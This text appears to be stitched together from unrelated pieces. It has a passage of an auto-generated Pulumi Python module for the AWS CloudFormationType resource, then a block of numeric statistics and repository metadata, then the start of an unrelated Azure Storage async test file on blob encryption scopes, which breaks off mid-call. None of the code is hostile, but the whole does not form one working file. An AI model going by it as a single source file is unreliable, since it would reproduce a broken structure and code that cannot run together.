$ pulumi import aws:cloudformation/cloudFormationType:CloudFormationType example arn:aws:cloudformation:us-east-1:123456789012:type/resource/ExampleCompany-ExampleService-ExampleType/1
```
:param str resource_name: The name of the resource.
:param CloudFormationTypeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CloudFormationTypeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CloudFormationTypeArgs.__new__(CloudFormationTypeArgs)
__props__.__dict__["execution_role_arn"] = execution_role_arn
__props__.__dict__["logging_config"] = logging_config
if schema_handler_package is None and not opts.urn:
raise TypeError("Missing required property 'schema_handler_package'")
__props__.__dict__["schema_handler_package"] = schema_handler_package
__props__.__dict__["type"] = type
if type_name is None and not opts.urn:
raise TypeError("Missing required property 'type_name'")
__props__.__dict__["type_name"] = type_name
__props__.__dict__["arn"] = None
__props__.__dict__["default_version_id"] = None
__props__.__dict__["deprecated_status"] = None
__props__.__dict__["description"] = None
__props__.__dict__["documentation_url"] = None
__props__.__dict__["is_default_version"] = None
__props__.__dict__["provisioning_type"] = None
__props__.__dict__["schema"] = None
__props__.__dict__["source_url"] = None
__props__.__dict__["type_arn"] = None
__props__.__dict__["version_id"] = None
__props__.__dict__["visibility"] = None
super(CloudFormationType, __self__).__init__(
'aws:cloudformation/cloudFormationType:CloudFormationType',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
default_version_id: Optional[pulumi.Input[str]] = None,
deprecated_status: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
documentation_url: Optional[pulumi.Input[str]] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
is_default_version: Optional[pulumi.Input[bool]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
provisioning_type: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
source_url: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_arn: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'CloudFormationType':
"""
Get an existing CloudFormationType resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
:param pulumi.Input[str] default_version_id: Identifier of the CloudFormation Type default version.
:param pulumi.Input[str] deprecated_status: Deprecation status of the version.
:param pulumi.Input[str] description: Description of the version.
:param pulumi.Input[str] documentation_url: URL of the documentation for the CloudFormation Type.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[bool] is_default_version: Whether the CloudFormation Type version is the default version.
:param pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] provisioning_type: Provisioning behavior of the CloudFormation Type.
:param pulumi.Input[str] schema: JSON document of the CloudFormation Type schema.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] source_url: URL of the source code for the CloudFormation Type.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] version_id: (Optional) Identifier of the CloudFormation Type version.
:param pulumi.Input[str] visibility: Scope of the CloudFormation Type.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CloudFormationTypeState.__new__(_CloudFormationTypeState)
__props__.__dict__["arn"] = arn
__props__.__dict__["default_version_id"] = default_version_id
__props__.__dict__["deprecated_status"] = deprecated_status
__props__.__dict__["description"] = description
__props__.__dict__["documentation_url"] = documentation_url
__props__.__dict__["execution_role_arn"] = execution_role_arn
__props__.__dict__["is_default_version"] = is_default_version
__props__.__dict__["logging_config"] = logging_config
__props__.__dict__["provisioning_type"] = provisioning_type
__props__.__dict__["schema"] = schema
__props__.__dict__["schema_handler_package"] = schema_handler_package
__props__.__dict__["source_url"] = source_url
__props__.__dict__["type"] = type
__props__.__dict__["type_arn"] = type_arn
__props__.__dict__["type_name"] = type_name
__props__.__dict__["version_id"] = version_id
__props__.__dict__["visibility"] = visibility
return CloudFormationType(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="defaultVersionId")
def default_version_id(self) -> pulumi.Output[str]:
"""
Identifier of the CloudFormation Type default version.
"""
return pulumi.get(self, "default_version_id")
@property
@pulumi.getter(name="deprecatedStatus")
def deprecated_status(self) -> pulumi.Output[str]:
"""
Deprecation status of the version.
"""
return pulumi.get(self, "deprecated_status")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description of the version.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="documentationUrl")
def documentation_url(self) -> pulumi.Output[str]:
"""
URL of the documentation for the CloudFormation Type.
"""
return pulumi.get(self, "documentation_url")
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@property
@pulumi.getter(name="isDefaultVersion")
def is_default_version(self) -> pulumi.Output[bool]:
"""
Whether the CloudFormation Type version is the default version.
"""
return pulumi.get(self, "is_default_version")
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> pulumi.Output[Optional['outputs.CloudFormationTypeLoggingConfig']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@property
@pulumi.getter(name="provisioningType")
def provisioning_type(self) -> pulumi.Output[str]:
"""
Provisioning behavior of the CloudFormation Type.
"""
return pulumi.get(self, "provisioning_type")
@property
@pulumi.getter
def schema(self) -> pulumi.Output[str]:
"""
JSON document of the CloudFormation Type schema.
"""
return pulumi.get(self, "schema")
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> pulumi.Output[str]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@property
@pulumi.getter(name="sourceUrl")
def source_url(self) -> pulumi.Output[str]:
"""
URL of the source code for the CloudFormation Type.
"""
return pulumi.get(self, "source_url")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="typeArn")
def type_arn(self) -> pulumi.Output[str]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
"""
return pulumi.get(self, "type_arn")
@property
@pulumi.getter(name="typeName")
def type_name(self) -> pulumi.Output[str]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@property
@pulumi.getter(name="versionId")
def version_id(self) -> pulumi.Output[str]:
"""
(Optional) Identifier of the CloudFormation Type version.
"""
return pulumi.get(self, "version_id")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[str]:
"""
Scope of the CloudFormation Type.
"""
return pulumi.get(self, "visibility")
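# A minimal sketch of looking up an existing registration with the static get()
# method documented above (comment-only so the module stays import-safe); the
# ARN reuses the example value from the Import docstring:
#
#   existing = CloudFormationType.get(
#       "example",
#       id="arn:aws:cloudformation:us-east-1:123456789012:type/resource/ExampleCompany-ExampleService-ExampleType/1")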
| 50.1
| 616
| 0.679114
| 4,177
| 36,072
| 5.646158
| 0.057936
| 0.065765
| 0.071235
| 0.06903
| 0.878816
| 0.845404
| 0.816147
| 0.798211
| 0.785321
| 0.746523
| 0
| 0.001999
| 0.22322
| 36,072
| 719
| 617
| 50.16968
| 0.839686
| 0.395099
| 0
| 0.578049
| 1
| 0
| 0.127611
| 0.032524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165854
| false
| 0.002439
| 0.017073
| 0
| 0.287805
| 0
| 0
| 0
| 0
| null
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0a72d552d8d32245e2aec7a82cd2682ad80b093e
| 36,560
| py
| Python
| sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
| rsdoherty/azure-sdk-for-python
| 6bba5326677468e6660845a703686327178bb7b1
| ["MIT"]
| 1
| 2021-04-26T21:15:01.000Z
| 2021-04-26T21:15:01.000Z
| sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
| rsdoherty/azure-sdk-for-python
| 6bba5326677468e6660845a703686327178bb7b1
| ["MIT"]
| 2
| 2021-08-24T15:32:30.000Z
| 2021-08-24T23:21:34.000Z
| sdk/storage/azure-storage-blob/tests/test_cpk_n_async.py
| rsdoherty/azure-sdk-for-python
| 6bba5326677468e6660845a703686327178bb7b1
| ["MIT"]
| 1
| 2016-04-19T22:15:47.000Z
| 2016-04-19T22:15:47.000Z
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import asyncio
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.core.pipeline.transport import AioHttpTransport
from multidict import CIMultiDict, CIMultiDictProxy
from azure.storage.blob import BlobType, BlobBlock, BlobSasPermissions, generate_blob_sas, ContainerEncryptionScope
from azure.storage.blob.aio import BlobServiceClient
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage.aio import AsyncStorageTestCase
# ------------------------------------------------------------------------------
# The encryption scopes are pre-created with the management-plane tool ArmClient,
# so we can use them directly in the tests.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
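# The dict above is the keyword-argument form of the same setting; a sketch of
# the equivalent model object (assuming ContainerEncryptionScope accepts the
# prevent_encryption_scope_override keyword, as its use with default_encryption_scope
# above suggests):
#
#   ContainerEncryptionScope(
#       default_encryption_scope="containerscope",
#       prevent_encryption_scope_override=True)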
# ------------------------------------------------------------------------------
class AiohttpTestTransport(AioHttpTransport):
"""Workaround to vcrpy bug: https://github.com/kevin1024/vcrpy/pull/461
"""
async def send(self, request, **config):
response = await super(AiohttpTestTransport, self).send(request, **config)
if not isinstance(response.headers, CIMultiDictProxy):
response.headers = CIMultiDictProxy(CIMultiDict(response.internal_response.headers))
response.content_type = response.headers.get("content-type")
return response
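# Usage note: this transport is wired into the tests below via
# transport=AiohttpTestTransport(connection_data_block_size=1024), so the
# vcrpy-recorded responses expose the same headers interface as live responses.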
class StorageCPKAsyncTest(AsyncStorageTestCase):
async def _setup(self, bsc):
self.config = bsc._config
self.byte_data = self.get_random_bytes(64 * 1024)
self.container_name = self.get_resource_name('utcontainer')
if self.is_live:
await bsc.create_container(self.container_name)
def _teardown(self, bsc):
if self.is_live:
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(bsc.delete_container(self.container_name))
            except Exception:
                # best-effort cleanup; the container may already be gone
                pass
return super(StorageCPKAsyncTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
async def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = await blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency)
return blob_client, resp
async def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
await blob.create_append_blob(encryption_scope=encryption_scope)
return blob
async def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
await blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_put_block_and_put_block_list(self, resource_group, location, storage_account, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
self.container_name = self.get_resource_name('utcontainer')
blob_client, _ = await self._create_block_blob(bsc)
await blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = await blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# parallel operation
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = await self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_sub_streams(self, resource_group, location, storage_account, storage_account_key):
        # due to a problem with the recording framework, this test can only run live
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
retry_total=0,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
blob_client, upload_response = await self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_block_blob_with_single_chunk(self, resource_group, location, storage_account, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = await self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_put_block_from_url_and_commit(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
# create source blob and get source blob url
source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # make sure chunked upload is used so the requests can be recorded
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
# create destination blob
self.config.use_byte_buffer = False
destination_blob_client, _ = await self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act part 1: make put block from url calls
await destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
source_offset=0, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
source_offset=4 * 1024, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert blocks
committed, uncommitted = await destination_blob_client.get_block_list('all')
self.assertEqual(len(uncommitted), 2)
self.assertEqual(len(committed), 0)
        # committing the blocks without the encryption scope should fail
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
with self.assertRaises(HttpResponseError):
await destination_blob_client.commit_block_list(block_list)
        # Act: committing the blocks with the encryption scope should succeed
put_block_list_resp = await destination_blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data[0: 8 * 1024])
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_append_block(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = await blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_append_block_from_url(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # force chunked upload
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
destination_blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = await destination_blob_client.append_block_from_url(source_blob_url,
source_offset=0,
source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data[0: 4 * 1024])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_append_blob_with_chunks(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = await blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_update_page(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client = await self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = await blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_update_page_from_url(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # make sure chunked upload is used so the requests can be recorded
source_blob_client, _ = await self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
